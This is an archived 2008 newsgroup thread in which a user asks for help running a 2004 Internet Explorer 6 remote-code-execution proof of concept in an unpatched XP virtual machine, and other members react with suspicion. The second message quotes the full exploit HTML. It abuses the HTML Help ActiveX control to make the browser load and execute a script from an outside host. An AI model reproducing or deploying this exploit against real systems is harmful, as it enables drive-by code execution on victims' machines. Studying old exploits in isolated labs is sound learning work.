(Msg. 1) Posted: Thu Jun 26, 2008 7:14 am
Post subject: Recreating Old code execution Vulnerability Add to elertz Archived from groups: microsoft>public>frontpage>programming (more info?)
I'm trying to recreate an old IE 6.0 vulnerability in a windows XP-SP2 box,
for learning purposes.
I'm using VMware (XP-SP2 unpatched box).
When I browse to my index.htm page I get the following error:
"An error has occured in the script onthis page.
Line: 4
Char: 1
Error: Invalid character
Code: 0
URL: ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm
Do you want to continue running scripts on this page?"
I then punch yes but nothing happens.
This is the code behind my index.htm
(Msg. 2) Posted: Fri Jun 27, 2008 9:07 pm
Post subject: Re: Recreating Old code execution Vulnerability Add to elertz [Login to view extended thread Info.] Archived from groups: per prev. post (more info?)
"Diogo" <Diogo.RemoveThis@discussions.microsoft.com> wrote in message
news:F65BA7DF-C92A-4251-91D9-55AAC129FED6@microsoft.com...
> I'm trying to recreate an old IE 6.0 vulnerability in a windows XP-SP2 box,
> for learning purposes.
> I'm using VMware (XP-SP2 unpatched box).
> When I browse to my index.htm page I get the following error:
>
> "An error has occured in the script onthis page.
> Line: 4
> Char: 1
> Error: Invalid character
> Code: 0
> URL: ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm
> Do you want to continue running scripts on this page?"
>
> I then punch yes but nothing happens.
> This is the code behind my index.htm
>
> "Download this file as well for your own testing: original htm.txt
> http://www.milw0rm.com/down.php?id=723 >
> //str0ke
> -->
>
> <html><head><title>CMDExe - Windows Exploit - Remote code execution with
> parameters - Proof of Concept</title></head><BODY
> style="font-family:Verdana;color:#0000FF;font-size:14px">More info about this
> exploit can be found at <a
> href="http://freehost19.websamba.com/shreddersub7/expl-discuss.htm"
> target="_new">hhttp://freehost19.websamba.com/shreddersub7/expl-discuss.htm</a>. ? 2004 ShredderSub7
> <script>
> function DisplayLocStrings() {
> Title.innerHTML = TAG_SYSCONFIG;
> Config_Link.innerHTML = TAG_OPENSYSCONFIG;
> Config_Desc.innerHTML = TAG_SYSCONFIGDESC;
> }
> </script>
> <br><OBJECT style="display:none" id="locate" type="application/x-oleobject"
> classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
> codebase="hhctrl.ocx#Version=5,2,3790,1194">
> <PARAM name="Command" value="Related Topics, MENU">
> <PARAM name="Button" value="Text:_">
> <PARAM name="Window" value="$global_blank">
> <PARAM name="Item1"
> value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm">
> </OBJECT>
> <OBJECT style="display:none" id="locator" type="application/x-oleobject"
> classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
> codebase="hhctrl.ocx#Version=5,2,3790,1194">
> <PARAM name="Command" value="Related Topics, MENU">
> <PARAM name="Button" value="Text:_">
> <PARAM name="Window" value="$global_blank">
> <PARAM name="Item1"
> value='command;javascript:execScript("document.write(\"<script
> language=\\\"javascript\\\"
> src=\\\"http://10.10.52.20/htm.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
>
> </OBJECT>
> <script>locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout("window.opener=null;window.close()",10000)</script></body></html>
>
> // milw0rm.com [2004-12-28]"
>
>
> Could someone help please.
(Msg. 3) Posted: Sat Jun 28, 2008 9:52 pm
Post subject: Re: Recreating Old code execution Vulnerability Add to elertz [Login to view extended thread Info.] Archived from groups: per prev. post (more info?)
I know this might arouse suspicion but we are talking about a vulnerability
from 2004... no one is vulnerable to this and I doing this in VMware. I
installed an old XP-SP2 version just to try it out.
I'm trying to learn network security and this example came up...
I've absolutely no malicious intentions, towards anyone.
Could someone help?
(Msg. 4) Posted: Tue Jul 01, 2008 4:40 am
Post subject: Re: Recreating Old code execution Vulnerability Add to elertz [Login to view extended thread Info.] Archived from groups: per prev. post (more info?)
_____________________________________________
SBR @ ENJOY (-: [ Microsoft MVP - FrontPage ]
"Warning - Using the F1 Key will not break anything!" (-;
_____________________________________________
"Diogo" <Diogo.TakeThisOut@discussions.microsoft.com> wrote in message news:C9A21A17-B116-4D1E-9BBD-8A16A2ED2CB6@microsoft.com...
|I know this might arouse suspicion but we are talking about a vulnerability
| from 2004... no one is vulnerable to this and I doing this in VMware. I
| installed an old XP-SP2 version just to try it out. | I'm trying to learn network security and this example came up...
| I've absolutely no malicious intentions, towards anyone.
| Could someone help?
(Msg. 5) Posted: Tue Jul 01, 2008 12:56 pm
Post subject: Re: Recreating Old code execution Vulnerability Add to elertz [Login to view extended thread Info.] Archived from groups: per prev. post (more info?)
methinks he is intentionally experimenting with the black arts.
his post should be removed
--
~~~~~~~~~~~~~~~~~~
Rob Giordano
Microsoft MVP Expression
"Stefan B Rusynko" <sbr_enjoy.TakeThisOut@hotmail.com> wrote in message
news:eJSutY12IHA.2424@TK2MSFTNGP04.phx.gbl...
> Your original post appears to have a virus / worm VBS/Phel.J attached
> (probably because your old XP-SP2 is unpatched)
> - selecting it I get an alert about the following worm
> http://onecare.live.com/standard/en-us/virusenc/virusencinfo.htm?keywo...avencyc >
> I suspect your old system is compromised
>
> --
>
> _____________________________________________
> SBR @ ENJOY (-: [ Microsoft MVP - FrontPage ]
> "Warning - Using the F1 Key will not break anything!" (-;
> _____________________________________________
>
>
> "Diogo" <Diogo.TakeThisOut@discussions.microsoft.com> wrote in message
> news:C9A21A17-B116-4D1E-9BBD-8A16A2ED2CB6@microsoft.com...
> |I know this might arouse suspicion but we are talking about a
> vulnerability
> | from 2004... no one is vulnerable to this and I doing this in VMware. I
> | installed an old XP-SP2 version just to try it out. > | I'm trying to learn network security and this example came up...
> | I've absolutely no malicious intentions, towards anyone.
> | Could someone help?
>
>
All times are: Eastern Time (US & Canada) (change)
Page 1 of 1
You can post new topics in this forum You can reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
Home
Forums
Home
FAQ
Search
Profile
Private Messages
Log in/Register/Password
Office Other